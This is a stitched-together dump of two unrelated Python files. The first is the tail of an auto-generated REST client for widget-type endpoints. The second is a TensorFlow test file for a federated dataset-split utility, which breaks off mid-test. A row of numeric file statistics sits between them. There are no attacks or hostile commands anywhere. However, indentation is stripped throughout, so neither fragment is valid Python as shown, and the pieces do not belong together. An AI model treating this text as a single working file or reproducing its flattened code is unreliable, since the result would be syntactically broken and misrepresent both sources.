"""Get all Widget types for specified Bundle (getBundleWidgetTypes) # noqa: E501
Returns an array of Widget Type objects that belong to the specified Widget Bundle. Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_using_get(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetType]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_bundle_widget_types_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
else:
(data) = self.get_bundle_widget_types_using_get_with_http_info(is_system, bundle_alias, **kwargs) # noqa: E501
return data
def get_bundle_widget_types_using_get_with_http_info(self, is_system, bundle_alias, **kwargs): # noqa: E501
"""Get all Widget types for specified Bundle (getBundleWidgetTypes) # noqa: E501
Returns an array of Widget Type objects that belong to the specified Widget Bundle. Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_bundle_widget_types_using_get_with_http_info(is_system, bundle_alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:return: list[WidgetType]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['is_system', 'bundle_alias'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_bundle_widget_types_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'is_system' is set
if ('is_system' not in params or
params['is_system'] is None):
raise ValueError("Missing the required parameter `is_system` when calling `get_bundle_widget_types_using_get`") # noqa: E501
# verify the required parameter 'bundle_alias' is set
if ('bundle_alias' not in params or
params['bundle_alias'] is None):
raise ValueError("Missing the required parameter `bundle_alias` when calling `get_bundle_widget_types_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'is_system' in params:
query_params.append(('isSystem', params['is_system'])) # noqa: E501
if 'bundle_alias' in params:
query_params.append(('bundleAlias', params['bundle_alias'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetTypes{?bundleAlias,isSystem}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[WidgetType]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_widget_type_by_id_using_get(self, widget_type_id, **kwargs): # noqa: E501
"""Get Widget Type Details (getWidgetTypeById) # noqa: E501
Get the Widget Type Details based on the provided Widget Type Id. Widget Type Details extend Widget Type and add image and description properties. Those properties are useful to edit the Widget Type but they are not required for Dashboard rendering. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_widget_type_by_id_using_get(widget_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str widget_type_id: A string value representing the widget type id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: WidgetTypeDetails
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_widget_type_by_id_using_get_with_http_info(widget_type_id, **kwargs) # noqa: E501
else:
(data) = self.get_widget_type_by_id_using_get_with_http_info(widget_type_id, **kwargs) # noqa: E501
return data
def get_widget_type_by_id_using_get_with_http_info(self, widget_type_id, **kwargs): # noqa: E501
"""Get Widget Type Details (getWidgetTypeById) # noqa: E501
Get the Widget Type Details based on the provided Widget Type Id. Widget Type Details extend Widget Type and add image and description properties. Those properties are useful to edit the Widget Type but they are not required for Dashboard rendering. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_widget_type_by_id_using_get_with_http_info(widget_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str widget_type_id: A string value representing the widget type id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: WidgetTypeDetails
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['widget_type_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_widget_type_by_id_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'widget_type_id' is set
if ('widget_type_id' not in params or
params['widget_type_id'] is None):
raise ValueError("Missing the required parameter `widget_type_id` when calling `get_widget_type_by_id_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'widget_type_id' in params:
path_params['widgetTypeId'] = params['widget_type_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetType/{widgetTypeId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WidgetTypeDetails', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_widget_type_using_get(self, is_system, bundle_alias, alias, **kwargs): # noqa: E501
"""Get Widget Type (getWidgetType) # noqa: E501
Get the Widget Type based on the provided parameters. Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. Available for any authorized user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_widget_type_using_get(is_system, bundle_alias, alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:param str alias: Widget Type alias (required)
:return: WidgetType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_widget_type_using_get_with_http_info(is_system, bundle_alias, alias, **kwargs) # noqa: E501
else:
(data) = self.get_widget_type_using_get_with_http_info(is_system, bundle_alias, alias, **kwargs) # noqa: E501
return data
def get_widget_type_using_get_with_http_info(self, is_system, bundle_alias, alias, **kwargs): # noqa: E501
"""Get Widget Type (getWidgetType) # noqa: E501
Get the Widget Type based on the provided parameters. Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. Available for any authorized user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_widget_type_using_get_with_http_info(is_system, bundle_alias, alias, async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool is_system: System or Tenant (required)
:param str bundle_alias: Widget Bundle alias (required)
:param str alias: Widget Type alias (required)
:return: WidgetType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['is_system', 'bundle_alias', 'alias'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_widget_type_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'is_system' is set
if ('is_system' not in params or
params['is_system'] is None):
raise ValueError("Missing the required parameter `is_system` when calling `get_widget_type_using_get`") # noqa: E501
# verify the required parameter 'bundle_alias' is set
if ('bundle_alias' not in params or
params['bundle_alias'] is None):
raise ValueError("Missing the required parameter `bundle_alias` when calling `get_widget_type_using_get`") # noqa: E501
# verify the required parameter 'alias' is set
if ('alias' not in params or
params['alias'] is None):
raise ValueError("Missing the required parameter `alias` when calling `get_widget_type_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'is_system' in params:
query_params.append(('isSystem', params['is_system'])) # noqa: E501
if 'bundle_alias' in params:
query_params.append(('bundleAlias', params['bundle_alias'])) # noqa: E501
if 'alias' in params:
query_params.append(('alias', params['alias'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetType{?alias,bundleAlias,isSystem}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WidgetType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def save_widget_type_using_post(self, **kwargs): # noqa: E501
"""Create Or Update Widget Type (saveWidgetType) # noqa: E501
Create or update the Widget Type. Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. When creating the Widget Type, the platform generates a Widget Type Id as a [time-based UUID](https://en.wikipedia.org/wiki/Universally_unique_identifier#Version_1_(date-time_and_MAC_address)). The newly created Widget Type Id will be present in the response. Specify an existing Widget Type Id to update the Widget Type. Referencing a non-existing Widget Type Id will cause a 'Not Found' error. The Widget Type alias is unique in the scope of the Widget Bundle. The special Tenant Id '13814000-1dd2-11b2-8080-808080808080' is automatically used if the create request is sent by a user with 'SYS_ADMIN' authority. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.save_widget_type_using_post(async_req=True)
>>> result = thread.get()
:param async_req bool
:param WidgetTypeDetails body:
:return: WidgetTypeDetails
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.save_widget_type_using_post_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.save_widget_type_using_post_with_http_info(**kwargs) # noqa: E501
return data
def save_widget_type_using_post_with_http_info(self, **kwargs): # noqa: E501
"""Create Or Update Widget Type (saveWidgetType) # noqa: E501
Create or update the Widget Type. Widget Type represents the template for widget creation. Widget Type and Widget are similar to class and object in OOP theory. When creating the Widget Type, the platform generates a Widget Type Id as a [time-based UUID](https://en.wikipedia.org/wiki/Universally_unique_identifier#Version_1_(date-time_and_MAC_address)). The newly created Widget Type Id will be present in the response. Specify an existing Widget Type Id to update the Widget Type. Referencing a non-existing Widget Type Id will cause a 'Not Found' error. The Widget Type alias is unique in the scope of the Widget Bundle. The special Tenant Id '13814000-1dd2-11b2-8080-808080808080' is automatically used if the create request is sent by a user with 'SYS_ADMIN' authority. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.save_widget_type_using_post_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param WidgetTypeDetails body:
:return: WidgetTypeDetails
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method save_widget_type_using_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/widgetType', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WidgetTypeDetails', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 48.396482 | 835 | 0.654998 | 4,424 | 35,765 | 5.037749 | 0.060805 | 0.062368 | 0.024768 | 0.022614 | 0.968502 | 0.963925 | 0.95697 | 0.950375 | 0.945619 | 0.941715 | 0 | 0.018292 | 0.264784 | 35,765 | 738 | 836 | 48.46206 | 0.829283 | 0.416189 | 0 | 0.790932 | 0 | 0 | 0.214382 | 0.068805 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037783 | false | 0 | 0.010076 | 0 | 0.103275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# reconstruction/shared/federated_trainer_utils_test.py (garyxcheng/federated, Apache-2.0)
# Copyright 2020, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for federated_trainer_utils.py."""
import tensorflow as tf
from reconstruction.shared import federated_trainer_utils
class FederatedTrainerUtilsTest(tf.test.TestCase):
def test_build_dataset_split_fn_none(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list,
[[0, 1], [2, 3], [4, 5], [0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
def test_build_dataset_split_fn_skip(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5], [0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3]])
def test_build_dataset_split_fn_aggregated(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=2)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
def test_build_dataset_split_fn_none_recon_epochs_variable(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list,
[[0, 1], [2, 3], [4, 5], [0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
def test_build_dataset_split_fn_skip_recon_epochs_variable(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5], [0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3]])
def test_build_dataset_split_fn_aggregated_recon_epochs_variable(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=None,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=3)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
def test_build_dataset_split_fn_none_recon_max_steps(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
# Setting recon_steps_max above the actual number of steps has no effect.
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=7,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list,
[[0, 1], [2, 3], [4, 5], [0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
def test_build_dataset_split_fn_skip_recon_max_steps(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=3)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [0, 1]])
self.assertAllEqual(post_recon_list, [[2, 3], [4, 5]])
# Setting recon_steps_max above the actual number of steps has no effect.
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=7,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=3)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [0, 1]])
self.assertAllEqual(post_recon_list, [[2, 3], [4, 5]])
def test_build_dataset_split_fn_aggregated_recon_max_steps(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=2)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
# Setting recon_steps_max above the actual number of steps has no effect.
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=2,
recon_epochs_constant=True,
recon_steps_max=7,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=2)
# Round number shouldn't matter.
recon_dataset, post_recon_dataset = split_dataset_fn(client_dataset, 3)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
def test_build_dataset_split_fn_none_recon_epochs_variable_max_steps(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
self.assertAllEqual(post_recon_list, [[0, 1], [2, 3], [4, 5]])
def test_build_dataset_split_fn_skip_recon_epochs_variable_max_steps(self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [4, 5], [0, 1], [4, 5]])
self.assertAllEqual(post_recon_list, [[2, 3]])
def test_build_dataset_split_fn_aggregated_recon_epochs_variable_max_steps(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=1,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils
.SPLIT_STRATEGY_AGGREGATED,
split_dataset_proportion=3)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [0, 1], [2, 3]])
self.assertAllEqual(post_recon_list, [[4, 5]])
def test_build_dataset_split_fn_none_recon_epochs_variable_max_steps_zero_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=0,
post_recon_steps_max=None,
split_dataset=False,
split_dataset_strategy=None,
split_dataset_proportion=None)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5]])
self.assertAllEqual(post_recon_list, [])
round_num = tf.constant(2, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
client_dataset, round_num)
recon_list = list(recon_dataset.as_numpy_iterator())
post_recon_list = list(post_recon_dataset.as_numpy_iterator())
self.assertAllEqual(recon_list, [[0, 1], [2, 3], [4, 5], [0, 1]])
self.assertAllEqual(post_recon_list, [])
def test_build_dataset_split_fn_skip_recon_epochs_variable_max_steps_zero_post_epochs(
self):
# 3 batches.
client_dataset = tf.data.Dataset.range(6).batch(2)
split_dataset_fn = federated_trainer_utils.build_dataset_split_fn(
recon_epochs_max=8,
recon_epochs_constant=False,
recon_steps_max=4,
post_recon_epochs=0,
post_recon_steps_max=None,
split_dataset=True,
split_dataset_strategy=federated_trainer_utils.SPLIT_STRATEGY_SKIP,
split_dataset_proportion=2)
round_num = tf.constant(1, dtype=tf.int64)
recon_dataset, post_recon_dataset = split_dataset_fn(
